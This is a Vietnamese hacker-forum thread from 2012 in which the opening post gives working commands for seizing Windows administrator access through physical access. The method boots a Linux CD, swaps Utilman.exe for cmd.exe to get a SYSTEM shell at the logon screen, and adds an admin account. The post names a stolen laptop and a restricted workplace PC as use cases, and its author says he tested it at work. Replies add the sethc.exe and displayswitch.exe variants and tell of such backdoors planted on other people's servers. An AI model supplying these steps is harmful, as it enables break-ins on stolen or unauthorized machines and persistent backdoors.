English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận hệ điều hành Windows Một cách lấy quyền admin của Windows khi có physical access  XML
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 31/01/2012 15:57:53 (+0700) | #1 | 252988
[Avatar]
 WinDak
Researcher
Joined: 27/01/2002 11:15:00
Messages: 223
Offline
[Profile] [PM]
Xin chia sẻ với anh em một cách đơn giản lấy quyền admin của Window. Sử dụng trong các trường hợp:
1) quên password
2) nơi làm việc không cho quyền admin
3) ăn trộm được con máy tính và không muốn format máy
..
2 + 3 thì không khuyến khích smilie
Nói chung là bất cứ khi nào mó máy được đến máy tính (và không ai để ý) là ta có thể chơi được trò này.

Dĩ nhiên có rất nhiều cách khác, nhưng đây là cách mình cho là đơn giản và nhanh gọn. Anh em nào biết cách hay hơn cũng xin chia sẻ trong topic này.

Thực hiện lần lượt các bước sau:

1) Burn 1 cái CD linux phiên bản bất kỳ
2) Boot bằng CD này, không cần cài, chỉ cần chạy được shell
3) Chạy những command sau lần lượt:
Code:
fdisk -l

để ý dòng nào có cái NTFS (FAT32), và copy cái /dev/xxx. ví dụ
Code:
/dev/sda2              13       64408   517250914    7  HPFS/NTFS

mount cái dev này vào folder chơi
Code:
mkdir /mnt/sda2
mount -t ntfs /dev/sda2 /mnt/sda2/


bây giờ đến đoạn tricky, ta sử dụng con "backdoor" cho sẵn của window. http://www.file.net/process/utilman.exe.html)

Code:
cd /mnt/sda2/Windows/System32/
mv Utilman.exe Utilman.exe.bak
cp cmd.exe Utilman.exe


Xong, bây giờ reboot lại vào Window, Nhấn tổ hợp [Window-Key] + U

Bảng cmd.exe chạy dưới quyền SYSTEM sẽ hiện lên. Việc còn lại chỉ là tạo 1 user admin:
Code:
net user foo passf00 /add
net localgroup Administrator foo /add


Sau đó tắt cmd đi vào login vào bằng foo/passf00

Chúc thành công

Tested : Window 7
Nguồn: sưu tầm smilie





-- w~ --
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 31/01/2012 19:13:59 (+0700) | #2 | 252992
[Avatar]
 tanviet12
Member
[Minus]    0    [Plus]
Joined: 10/05/2010 12:15:15
Messages: 138
Location: TP - HCM
Offline
[Profile] [PM] [Email]
Hi thanks anh,

Cách này em thấy thông thường dùng để reset mật khẩu Windows server 2008, có một bài viết cũng tương tự:

http://thanhcuong.wordpress.com/2010/11/23/cach-reset-password-windows-server-2008-khi-l%E1%BB%A1-quen-password/
BTV
fb.com/buitanviet
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 31/01/2012 21:05:22 (+0700) | #3 | 252996
[Avatar]
 xnohat
Moderator
Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon smilie
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 31/01/2012 21:43:11 (+0700) | #4 | 252997
[Avatar]
 maitan_10000
Member
[Minus]    0    [Plus]
Joined: 12/02/2011 10:56:12
Messages: 43
Offline
[Profile] [PM]

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon smilie 

bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ?
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 31/01/2012 22:46:19 (+0700) | #5 | 253000
[Avatar]
 WinDak
Researcher
Joined: 27/01/2002 11:15:00
Messages: 223
Offline
[Profile] [PM]

maitan_10000 wrote:

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon smilie 

bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ? 


Win7 cũng làm được đấy smilie Windows/System32/sethc.exe
Ngoài ra trong win7 còn có thằng displayswitch.exe smilie) . Lắm "backdoor" quá
-- w~ --
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 31/01/2012 23:27:53 (+0700) | #6 | 253002
phanledaivuong
Member
[Minus]    0    [Plus]
Joined: 23/05/2008 17:34:21
Messages: 315
Location: /dev/null
Offline
[Profile] [PM] [WWW]

WinDak wrote:

maitan_10000 wrote:

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon smilie 

bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ? 


Win7 cũng làm được đấy smilie Windows/System32/sethc.exe
Ngoài ra trong win7 còn có thằng displayswitch.exe smilie) . Lắm "backdoor" quá  


Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta smilie. thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack smilie.
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 01/02/2012 15:13:36 (+0700) | #7 | 253012
[Avatar]
 WinDak
Researcher
Joined: 27/01/2002 11:15:00
Messages: 223
Offline
[Profile] [PM]

phanledaivuong wrote:

Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta smilie. thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack smilie


Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ).

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc smilie.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

-- w~ --
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 01/02/2012 17:28:25 (+0700) | #8 | 253016
phanledaivuong
Member
[Minus]    0    [Plus]
Joined: 23/05/2008 17:34:21
Messages: 315
Location: /dev/null
Offline
[Profile] [PM] [WWW]

WinDak wrote:

phanledaivuong wrote:

Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta smilie. thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack smilie


Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ).

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc smilie.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

 


trước đây mình có thử chép đè bằng Ubuntu. tuy nhiên khi khởi động vào Windows 7 thì bị báo lỗi nên phải sửa lại như cũ. chắc là để hôm nào mình thử lại.
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 11/02/2012 13:32:28 (+0700) | #9 | 253497
[Avatar]
 __mask
Member
[Minus]    0    [Plus]
Joined: 05/02/2012 10:50:34
Messages: 4
Location: Desert
Offline
[Profile] [PM]
Mình sẽ dùng disk boot là nhanh nhất smilie
Không thể kiểm soát mọi thứ đến với mình, nhưng ta có thể kiểm soát được thái độ của mình khi điều đó xảy đến
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 14/02/2012 07:17:23 (+0700) | #10 | 253589
[Avatar]
 .lht.
Member
[Minus]    0    [Plus]
Joined: 26/09/2010 10:06:38
Messages: 75
Location: Inside you
Offline
[Profile] [PM]

WinDak wrote:

phanledaivuong wrote:

Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta smilie. thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack smilie


Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ).

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc smilie.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

 


Cái này thì dùng tool có sẵn của Windows giải quyết smilie
Trong cmd gõ lệnh takeown /? để biết thêm chi tiết smilie
Trash from trash is the place for new good things ~
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 19/02/2012 15:53:13 (+0700) | #11 | 254492
kentmt
Member
[Minus]    0    [Plus]
Joined: 30/11/2011 20:56:14
Messages: 2
Offline
[Profile] [PM]
Mấy bồ coi thử cái này ..
http://www.piotrbania.com/all/kon-boot/
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 21/02/2012 15:48:15 (+0700) | #12 | 254764
imphch
Member
[Minus]    0    [Plus]
Joined: 21/11/2010 12:20:53
Messages: 1
Offline
[Profile] [PM]
Hiren's Boot là nhanh và hiệu quả nhất smilie
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 03/03/2012 10:52:18 (+0700) | #13 | 256719
golemdragon
Member
[Minus]    0    [Plus]
Joined: 27/02/2012 08:23:51
Messages: 2
Offline
[Profile] [PM]
Co anh nao biet su khac nhau giua windowns 7 32bit va windowns 7 64bit ko?chi cho minh di.minh lang thang tren mang thi thay ho noi giong nhau qua va cha chi tiet chut nao het
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 04/03/2012 03:10:05 (+0700) | #14 | 256790
TMDTHBC
Member
[Minus]    0    [Plus]
Joined: 26/08/2011 04:43:07
Messages: 37
Offline
[Profile] [PM] [Email]

.lht. wrote:

WinDak wrote:

phanledaivuong wrote:

Win7 không ghi đè kiểu thông thường được anh ạ. còn cách sethc.exe thì 1 số cu cậu còn làm backdoor trên cả server của người ta smilie. thằng admin server cứ há mồm tìm backdoor (dùng diệt virus quét thật lực) nhưng mấy hôm sau lại thấy user administrator khác được tạo thêm. cuối cùng sau 3 ngày liền ngồi rình thì tóm được 1 cái ComputerName remote vào -> google ra tên thằng Hack smilie


Đúng là trong Windows thì những file hệ thống thường có "Windows File Protection" bảo vệ nên không thể chép đè lên chúng TRONG WINDOWS dù có quyền admin đi chăng nữa. Có lẽ phải patch một số file khác để làm việc đó (như thế nào tớ cũng không rõ).

Cho nên cách tớ và các anh em trên đang thảo luận chỉ làm việc khi boot vào 1 HDH khác, khi đó file system của Window không có gì bảo vệ.

nói nhỏ: đã test thành công với thằng máy Windows 7 ở chỗ mình làm việc smilie.

Anh em nào giỏi "cracking" có khi còn có thể patch một vài file khi khởi động của Windows để cho đăng nhập với bất kì password nào chẳng hạn.

 


Cái này thì dùng tool có sẵn của Windows giải quyết smilie
Trong cmd gõ lệnh takeown /? để biết thêm chi tiết smilie  


take ownership chỉ dùng khi đã logon vào system rồi, còn chưa login thì ... botay
[Up] [Print Copy]
  [Article]   Một cách lấy quyền admin của Windows khi có physical access 08/05/2012 17:01:35 (+0700) | #15 | 262727
[Avatar]
 bolzano_1989
Journalist
[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon smilie 


WinDak wrote:

maitan_10000 wrote:

xnohat wrote:
Cách này giống ngày xưa mình làm trên thằng Windows XP thì đổi file sethc.exe là file của chương trình stickykey bằng file cmd.exe . Sau khi bấm 5 lần phím Shift thì cmd.exe hiện ra dù đang ở màn hình logon smilie 

bên xp thì dùng được, không biết bên win7 còn dùng được không nhỉ? 


Win7 cũng làm được đấy smilie Windows/System32/sethc.exe
Ngoài ra trong win7 còn có thằng displayswitch.exe smilie) . Lắm "backdoor" quá  


Với Windows XP SP3 thì các cách trên không dùng được cho limited user nữa rồi smilie .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|